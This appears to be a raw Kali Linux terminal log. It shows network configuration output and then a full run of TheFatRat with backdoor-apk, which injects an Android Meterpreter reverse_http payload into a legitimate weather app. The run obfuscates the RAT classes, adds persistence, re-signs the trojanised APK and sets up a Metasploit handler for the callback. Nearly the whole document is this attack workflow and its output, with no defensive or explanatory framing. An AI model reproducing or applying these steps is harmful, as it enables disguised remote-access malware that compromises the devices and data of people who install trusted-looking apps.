eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.100.238 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::20c:29ff:fe7e:b94e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:7e:b9:4e txqueuelen 1000 (Ethernet)
RX packets 4825 bytes 2941520 (2.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5780 bytes 891394 (870.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1004 bytes 106816 (104.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1004 bytes 106816 (104.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.8.0.2 netmask 255.255.0.0 destination 10.8.0.2
inet6 fdda:d0d0:cafe:1194::1000 prefixlen 64 scopeid 0x0<global>
inet6 fe80::44b1:5bb1:12d2:e76e prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 3229 bytes 1507100 (1.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 4378 bytes 445050 (434.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2312
inet 192.168.100.106 netmask 255.255.255.0 broadcast 192.168.100.255
inet6 fe80::7bae:4f96:fdb:22b9 prefixlen 64 scopeid 0x20<link>
ether 00:13:ef:f4:00:60 txqueuelen 1000 (Ethernet)
RX packets 292 bytes 173648 (169.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 18 bytes 2738 (2.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
oot@kali:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
0.0.0.0 192.168.100.1 0.0.0.0 UG 100 0 0 eth0
0.0.0.0 192.168.100.1 0.0.0.0 UG 600 0 0 wlan0
10.8.0.0 0.0.0.0 255.255.0.0 U 0 0 0 tun0
128.0.0.0 10.8.0.1 128.0.0.0 UG 0 0 0 tun0
185.213.154.134 192.168.100.1 255.255.255.255 UGH 0 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
192.168.100.0 0.0.0.0 255.255.255.0 U 600 0 0 wlan0
root@kali:~#
IP device: 192.168.100.129
[ ]===========================================================================[ ]
[ ] [ ]
[ ] ) ( ) ) ( ( ) [ ]
[ ] ( ( ( ( /( )\ ) ( /( ( /( )\ ) )\ ) ( /( ( [ ]
[ ] )\ )\ )\ )\())(()/( )\()) )\()) (()/((()/( )\()) )\ ) [ ]
[ ] ((_)((((_)( (((_) |((_)\ /(_)) ((_)\ ((_)\ /(_))/(_))((_)\ (()/( [ ]
[ ] (_) )\_ )\ )\___ |_ ((_)(_))_ ((_) ((_) (_)) (_)) _((_) /(_))_ [ ]
[ ] | _ ) (_)_\(_)((/ __|| |/ / | \ / _ \ / _ \ | _ \|_ _| | \| |(_)) __|[ ]
[ ] | _ \ / _ \ | (__ ‘ < | |) || (_) || (_) || / | | | .` | | (_ |[ ]
[ ] |___/ /_/ \_\ \___| _|\_\ |___/ \___/ \___/ |_|_\|___| |_|\_| \___|[ ]
[ ]===========================================================================[ ]
[ ] Embed a Metasploit Payload in an original .apk files [ ]
[ ] This script is POC for injecting metasploit payload arbitary apk backdoor [ ]
[ ]===========================================================================[ ]
Cleaning Temp files
Done!
Your local IPV4 address is : 192.168.100.106
Your local IPV6 address is : fe80::7bae:4f96:fdb:22b9
Your public IP address is :
Your Hostname is :
Set LHOST IP: 192.168.100.106
Set LPORT: 8080
Enter the path to your android app/game .(ex: /root/downloads/myapp.apk)
Path : /root/Downloads/buienradar.apk
Testing your apk before next step …
+——————————————-+
| [ 1 ] android/meterpreter/reverse_http |
| [ 2 ] android/meterpreter/reverse_https |
| [ 3 ] android/meterpreter/reverse_tcp |
| [ 4 ] android/shell/reverse_http |
| [ 5 ] android/shell/reverse_https |
| [ 6 ] android/shell/reverse_tcp |
+——————————————-+
Choose Payload : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]
+————————————-+
| [ 1 ] Use Backdoor-apk 0.2.4a |
| [ 2 ] Use old Fatrat method |
| [ 3 ] Use MsfVenom Embedded method |
+————————————-+
Select Tool to create apk : 1
[ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ]$
Generate Backdoor
+————++————————-++———————–+
| Name || Descript || Your Input
+————++————————-++———————–+
| LHOST || The Listen Addres || 192.168.100.106
| LPORT || The Listen Ports || 8080
| OUTPUTNAME || The Filename output || app_backdoor.apk
| PAYLOAD || Payload To Be Used || android/meterpreter/reverse_http
+————++————————-++———————–+
________
/ ______ \
|| _ _ ||
||| || ||| AAAAAA PPPPPPP KKK KKK
|||_||_||| AAA AAA PPP PPP KKK KKK
|| _ _o|| (o) AAA AAA PPP PPP KKKKKK
||| || ||| AAAAAAAA PPPPPPPP KKK KKK
|||_||_||| AAA AAA PPP KKK KKK
||______|| AAA AAA PPP KKK KKK
/__________\
________|__________|__________________________________________
/____________\
|____________| Dana James Traversie
[*] Running backdoor-apk.sh v0.2.4a on Thu Jul 6 07:29:27 AM EDT 2023
[+] Android manifest permission options:
1) Keep original
2) Merge with payload and shuffle
[?] Please select an Android manifest permission option: 2
[*] Decompiling original APK file…done.
[*] Locating smali file to hook in original project…done.
[+] Package where RAT smali files will be injected: com/supportware/Buienradar
[+] Smali file to hook RAT payload: nl/rtl/buienradar/BuienradarApplication.smali
[*] Generating RAT APK file…done.
[*] Decompiling RAT APK file…done.
[*] Merging permissions of original and payload projects…done.
[*] Injecting helpful Java classes in RAT APK file…done.
[*] Creating new directory in original package for RAT smali files…done.
[+] Inject package path: com/supportware/Buienradar/anvzv
[+] Generated new smali class name for MainBroadcastReceiver.smali: Xoodj
[+] Generated new smali class name for MainService.smali: Omede
[+] Generated new smali class name for Payload.smali: Xiqlw
[+] Generated new smali class name for StringObfuscator.smali: Mvtrc
[+] Generated new smali method name for StringObfuscator.obfuscate method: ludhu
[+] Generated new smali method name for StringObfuscator.unobfuscate method: wgycs
[*] Copying RAT smali files to new directories in original project…done.
[*] Fixing RAT smali files…done.
[*] Obfuscating const-string values in RAT smali files…Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
done.
[*] Adding hook in original smali file…done.
[*] Adding persistence hook in original project…done.
[*] Recompiling original project with backdoor…done.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Warning:
The certificate uses the SHA1withRSA signature algorithm which is considered a security risk. This algorithm will be disabled in a future update.
The certificate uses a 1024-bit RSA key which is considered a security risk. This key size will be disabled in a future update.
[*] Generating RSA key for signing…done.
[*] Signing recompiled APK…done.
[*] Verifying signed artifacts…done.
[*] Aligning recompiled APK…done.
[*] Backdoor apk created succefully
Your RAT apk was successfully builded and signed , it is located here :
~/Fatrat_Generated/app_backdoor.apk
Do you want to create a listener for this configuration
to use in msfconsole in future ?
Choose y/n :
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
—- ————— ——– ———–
Payload options (android/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
LHOST 192.168.100.106 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
— —-
0 Wildcard Target
msf6 exploit(multi/handler) >